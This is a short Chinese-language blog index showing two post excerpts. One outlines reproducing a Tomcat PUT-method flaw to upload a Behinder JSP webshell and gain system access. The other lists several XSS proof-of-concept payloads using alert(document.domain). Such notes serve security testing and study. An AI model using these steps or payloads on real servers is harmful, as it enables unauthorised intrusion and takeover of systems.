摘要：一、漏洞复现： BurpSuite抓包，发送一个PUT的请求，数据包为冰蝎的马 如果存在该漏洞，Response的状态码为201 直接访问该文件，可以看到jsp马已经存在了 使用冰蝎进行连接，获取系统的权限 二、漏洞原因： 在tomcat/conf/web.xml文件中，Tomcat配置可写文件的选 阅读全文

摘要：#1 <script>alert(document.domain)</script> #2 ""</b> <script>alert(document.domain)</script> #3 <svg></svg><script>alert(document.domain)</script> #4 阅读全文